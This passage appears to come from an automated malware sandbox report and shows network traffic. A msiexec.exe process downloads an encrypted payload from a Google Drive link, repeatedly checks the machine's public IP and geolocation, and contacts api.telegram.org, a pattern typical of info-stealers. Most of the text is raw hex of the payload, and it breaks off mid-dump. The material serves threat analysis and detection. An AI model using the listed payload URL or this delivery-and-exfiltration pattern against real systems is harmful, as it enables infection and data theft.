Jan 10, 2025 23:11:20.986162901 CET	192.168.2.4	1.1.1.1	0x1656	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:11:25.489065886 CET	192.168.2.4	1.1.1.1	0xd2ba	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:11:26.764102936 CET	192.168.2.4	1.1.1.1	0x5e25	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:11:37.536683083 CET	192.168.2.4	1.1.1.1	0xac5e	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 23:11:19.599718094 CET	1.1.1.1	192.168.2.4	0x52bb	No error (0)	drive.google.com		142.250.185.206	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:11:20.993937016 CET	1.1.1.1	192.168.2.4	0x1656	No error (0)	drive.usercontent.google.com		142.250.184.193	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:11:25.495690107 CET	1.1.1.1	192.168.2.4	0xd2ba	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 23:11:25.495690107 CET	1.1.1.1	192.168.2.4	0xd2ba	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:11:25.495690107 CET	1.1.1.1	192.168.2.4	0xd2ba	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:11:25.495690107 CET	1.1.1.1	192.168.2.4	0xd2ba	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:11:25.495690107 CET	1.1.1.1	192.168.2.4	0xd2ba	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:11:25.495690107 CET	1.1.1.1	192.168.2.4	0xd2ba	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:11:26.771214008 CET	1.1.1.1	192.168.2.4	0x5e25	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:11:26.771214008 CET	1.1.1.1	192.168.2.4	0x5e25	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:11:26.771214008 CET	1.1.1.1	192.168.2.4	0x5e25	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:11:26.771214008 CET	1.1.1.1	192.168.2.4	0x5e25	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:11:26.771214008 CET	1.1.1.1	192.168.2.4	0x5e25	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:11:26.771214008 CET	1.1.1.1	192.168.2.4	0x5e25	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:11:26.771214008 CET	1.1.1.1	192.168.2.4	0x5e25	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:11:37.544399977 CET	1.1.1.1	192.168.2.4	0xac5e	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	50004	132.226.247.73	80	3192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:11:25.504414082 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 23:11:26.210196972 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:11:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 23:11:26.217849016 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 23:11:26.433708906 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:11:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 23:11:27.399666071 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 23:11:27.613913059 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:11:27 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	50007	132.226.247.73	80	3192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:11:28.228861094 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 23:11:28.905448914 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:11:28 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	50009	132.226.247.73	80	3192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:11:29.566684961 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 23:11:30.284703016 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:11:30 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	50011	132.226.247.73	80	3192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:11:30.911643028 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 23:11:31.671853065 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:11:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	50013	132.226.247.73	80	3192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:11:32.287682056 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 23:11:32.972223997 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:11:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	50015	132.226.247.73	80	3192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:11:33.594038010 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 23:11:34.325052023 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:11:34 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	50017	132.226.247.73	80	3192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:11:34.927735090 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 23:11:35.599380970 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:11:35 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	50019	132.226.247.73	80	3192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:11:36.188204050 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 23:11:36.888720036 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:11:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	50002	142.250.185.206	443	3192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:11:20 UTC	216	OUT	GET /uc?export=download&id=1tTuCtWc8QWxmudjTRrFkrhq7MJC0UzWJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2025-01-10 22:11:20 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 22:11:20 GMT Location: https://drive.usercontent.google.com/download?id=1tTuCtWc8QWxmudjTRrFkrhq7MJC0UzWJ&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-q2MHRvIFfUjG6I7oMLy15A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	50003	142.250.184.193	443	3192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:11:21 UTC	258	OUT	GET /download?id=1tTuCtWc8QWxmudjTRrFkrhq7MJC0UzWJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-01-10 22:11:24 UTC	4940	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFIdbgQtopGoqpGtH9n3_-KCzI6WYGbx0HTTk53jAf9mtkhSCcC_UlwCvbfBcGEDdC4lKB48FVlaPRI Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="yqdLcuOeHN50.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 277056 Last-Modified: Tue, 10 Dec 2024 08:14:41 GMT Date: Fri, 10 Jan 2025 22:11:24 GMT Expires: Fri, 10 Jan 2025 22:11:24 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=e3xsHQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-10 22:11:24 UTC	4940	IN	Data Raw: 44 f3 30 55 51 de 89 fc 65 95 7e 3a f8 f6 48 64 99 50 16 14 c2 ec 18 37 3d fb b2 03 36 4d f4 3a d4 b1 dc 2d 51 51 5c b2 72 d0 c0 07 69 15 54 4a f0 de 06 f7 8c 26 db 77 5d d3 c0 08 a0 b1 d3 bc 93 a7 30 92 b2 f8 d9 8c 22 e5 e3 13 6a 63 d1 d7 bd ae 07 1b 6a 78 c7 85 a1 f5 fe 4a 95 e5 d8 f6 9f 6d f0 c2 41 93 0f 3f 62 26 4a 8f 1e ba 42 3d 97 be e7 8f bb 68 0c f3 57 61 7a 31 a9 e7 25 37 5f 51 b0 42 2a 09 94 7f bf 38 9f cd 59 9d 9a 15 5e 4f 11 e5 88 c0 20 38 0e c4 50 89 f3 89 f7 74 0e c0 33 91 1f de c4 1d dd 35 f2 87 bc 95 a4 a6 f9 4c d2 dc f7 40 4c 46 07 35 41 1e ef 85 ec 2a 90 36 5a 6a eb 2c 5d f5 32 82 1f 95 29 c1 6f 69 5c 66 64 01 d1 a0 17 1c 87 ef 21 ee 45 76 94 4e e6 6b cd 16 fd 8a 89 15 fa 98 d2 ba bd 66 b2 df a4 03 84 99 51 07 7f 27 77 46 7e 40 2b 39 76 Data Ascii: D0UQe~:HdP7=6M:-QQ\riTJ&w]0"jcjxJmA?b&JB=hWaz1%7_QB8Y^O 8Pt35L@LF5A6Zj,]2)oi\fd!EvNkfQ'wF~@+9v
2025-01-10 22:11:24 UTC	4817	IN	Data Raw: 30 bf 8e 21 1f 23 5a 37 d7 94 a4 1b 20 7e c0 47 eb f8 cf c9 4b cb af 43 d2 d7 dc 2c 4e 74 1b a3 51 75 9d 3a 76 15 60 0f d9 46 0f 11 25 97 fc bf 74 9a 2d 72 80 a7 5c da dc d2 e3 0f 0a 55 d4 92 45 4d 53 52 81 42 65 c3 a2 8c e6 2d 1b 84 66 14 cc 0b eb 1b 9d 43 c3 57 d1 9a df 65 93 53 0e d1 3c 45 98 97 be 7e 60 10 b8 ed 3f 4c 96 8f d4 42 90 ce 92 6a d3 bb 90 30 a4 13 0c dd fe 1c fc 03 41 fc c5 3c fe a5 e9 a8 21 32 a0 be 55 cd 32 d7 35 da fe 5e 28 b5 bc f1 17 74 85 f1 17 61 a1 c5 cf 3c 72 fe 73 0b 94 50 95 e6 b1 bb 31 c4 55 3d 64 c4 a5 e3 ac 5b ed 82 79 6e 91 5c 97 a1 0e 3c 76 78 9c 90 49 b4 ed a9 87 85 b6 16 cb 8b 9e f2 97 a7 ac cc d5 90 89 82 6e 7a e1 23 bd 8e ff 31 40 10 18 f6 76 d8 21 43 42 5f be 74 9f b8 65 75 71 b2 ca 52 f8 2e ed 9e 1e 62 3c 45 78 7e 97 Data Ascii: 0!#Z7 ~GKC,NtQu:v`F%t-r\UEMSRBe-fCWeS<E~`?LBj0A<!2U25^(ta<rsP1U=d[yn\<vxInz#1@v!CB_teuqR.b<Ex~
2025-01-10 22:11:24 UTC	1324	IN	Data Raw: 1b 13 39 9a cc 77 53 1a 39 9e 37 01 41 0e 83 25 b3 6c 65 36 5b 3d b0 42 e8 f2 93 af 54 1e b6 27 d2 16 bc d1 d9 39 17 2e 54 3f bb 93 96 73 c9 61 bc 0e e8 21 6d d3 9b 06 8a 67 b2 b2 24 8a 99 bb 4b dc 1a f5 bf 7c e4 68 ee c0 df 67 f8 60 5f 69 27 53 a7 19 08 75 eb b4 f9 05 dc d7 18 33 1d 7f 09 ab 06 37 1f fd a0 98 b1 8b 1b 8c 26 ef f0 1b 84 94 af ed 05 ae 03 68 a9 78 c7 8f 8e 31 fe 4a 9f e5 c9 fe f0 a8 f0 c2 4b ed 32 3f 62 22 25 49 1e ba 48 3d 86 b6 95 70 ab 68 7c db e3 61 7a 3b 5b f2 34 37 21 66 51 4c 2a b7 f2 75 9e 80 94 81 85 b4 d3 f0 77 3c 31 94 df b9 35 93 60 a9 00 48 b7 f0 b1 af 7a e0 5b 56 1a b4 c3 80 f2 5c ec 05 dd c3 89 be 94 23 b2 1b fc 57 33 5b 33 35 31 bc ca 9e 92 00 c0 73 5e c8 82 31 2c d0 fb 07 ff 51 01 b4 6f 69 56 09 ac 01 31 aa 15 63 b0 ee 71 Data Ascii: 9wS97A%le6[=BT'9.T?sa!mg$K\|hg`_i'Su37&hx1JK2?b"%IH=ph\|az;[47!fQL*uw<15`Hz[V\#W3[351s^1,QoiV1cq
2025-01-10 22:11:24 UTC	1390	IN	Data Raw: 8b a0 94 e9 75 fd 48 a3 83 f1 65 7c fa b3 08 ac 00 25 9e 1e 1f 8b c2 69 85 c5 d6 b3 d8 eb 49 7f fa 1c e9 45 87 9d 92 58 41 b2 a1 05 54 2b b3 7e 75 4b 33 e2 b8 ad 13 fc 9a 14 9b 41 36 7a bc 4a 1b 4f 16 02 65 f5 0a c2 58 8c f6 1a 13 33 ff 90 ab 8d 03 0f 97 18 8c 01 04 90 21 96 52 75 6f 48 37 1d be cb e5 bb 1b 54 1e c2 b7 f7 0e ca 50 b5 3b 67 fc 67 0e 44 ab 96 79 db 3d 98 07 9c 1b 68 ea 28 a6 a2 12 cc 9d 2e 99 bf df 52 a8 1a 85 a3 54 45 68 e2 ca c9 b1 8e 73 58 72 20 6a e9 27 08 75 ef b1 26 71 66 c4 18 45 10 a0 09 ab 08 37 97 fd a0 98 a0 da a7 cc 26 e5 e7 3b ab 9c d1 d1 05 70 17 3e 42 4c c7 85 eb e6 dd 4a bd 87 d8 f6 95 b3 f0 c2 41 93 71 08 62 26 4e fd 7d b8 42 4d 81 96 66 8f bb 62 1a 0d 56 72 5e 20 0d cb 79 2a dc 0e 0a 4c 2b 98 8b c0 47 8f 9e f1 36 99 d9 55 Data Ascii: uHe\|%iIEXAT+~uK3A6zJOeX3!RuoH7TP;ggDy=h(.RTEhsXr j'u&qfE7&;p>BLJAqb&N}BMfbVr^ y*L+G6U
2025-01-10 22:11:24 UTC	1390	IN	Data Raw: 36 9e 67 17 46 ee 4e 0b 67 d5 a1 5a e9 71 5f 45 e3 f1 92 7e 61 07 51 20 d9 01 00 82 03 0e 84 c2 13 27 9e ea 9b 6c ef 3a 98 58 39 fb 24 73 83 94 47 32 97 b8 71 7d 2c dc a9 d7 6e 23 90 d1 81 13 8c 3c 42 49 3f 1c 70 af 46 c7 5b 0a 70 44 97 69 b0 fa d4 95 32 92 39 90 c6 bd 73 08 0f bf 12 08 6d 08 81 28 a4 2b cd 36 5b 3d 6d 1c c5 f9 93 be 5c 08 a7 df d2 16 b2 a3 ba 2a 1f 20 7c 17 3a 97 be b2 df 9f b7 72 22 30 6b e0 58 15 82 19 f6 9d 24 8e e3 f2 7a de 1e f6 15 54 65 62 81 07 c9 99 f3 73 49 70 31 6c f8 d6 08 75 e1 a0 16 05 8e 18 18 35 64 bf 21 cf 0c 1f d8 fd 7e 82 94 d0 ed 8c 26 ef f0 19 95 b4 b3 d7 05 a4 d9 1b 6a 78 c7 fb d4 f5 fe 4e e7 86 da f6 ef 7b d8 43 41 93 05 29 9c 27 59 84 0f b1 7b f6 96 be e7 f1 90 68 0c f7 7f 8a 7a 31 23 f4 29 49 67 4e 0a 48 58 2a 8c Data Ascii: 6gFNgZq_E~aQ 'l:X9$sG2q},n#<BI?pF[pDi29sm(+6[=m\* \|:r"0kX$zTebsIp1lu5d!~&jxN{CA)'Y{hz1#)IgNHX*
2025-01-10 22:11:24 UTC	1390	IN	Data Raw: af eb 17 42 31 c5 82 c0 5c 2e fd 94 66 5a 9e ec 2a 11 45 99 5a e3 07 a7 61 f9 f3 e7 47 e0 77 f3 02 ba ff 03 82 6a ff 26 c5 19 27 9e f2 9b 6c ef 3b 16 5a 39 81 21 5c 13 92 28 e9 81 46 7a 67 2c 8a 5e d6 6e 29 84 7f e8 13 8c 39 19 ad 3f 1c 70 ce f9 a9 6a 7a 67 cd e6 0a b2 fb 81 95 64 57 39 90 c8 83 89 09 1c b0 6c b8 41 04 9a 52 3e 51 07 46 73 6c 6d 1c e4 8c d8 af 54 1a e0 5f d2 16 b2 dd a5 3b 17 5a 6a 5d 3a 93 9c db cb 8b a9 35 54 30 6b e0 2c 87 8a 67 cd 91 24 82 ef 3c 6a de 6a ea 12 54 65 62 ee c2 b7 db f9 73 5c 06 63 6a 97 1c 7b c9 eb a0 0d 6c 5c d7 18 3f 6e 97 53 ab 0c 15 c3 70 e0 92 b1 f9 fc 9a 54 64 f6 13 e5 3e f4 c0 2d 1a 07 1b 60 da e2 9d 93 06 f1 4a e5 47 fd ef e1 55 f0 c2 45 31 2a 25 10 31 5a 8f 6e 18 67 26 e9 a2 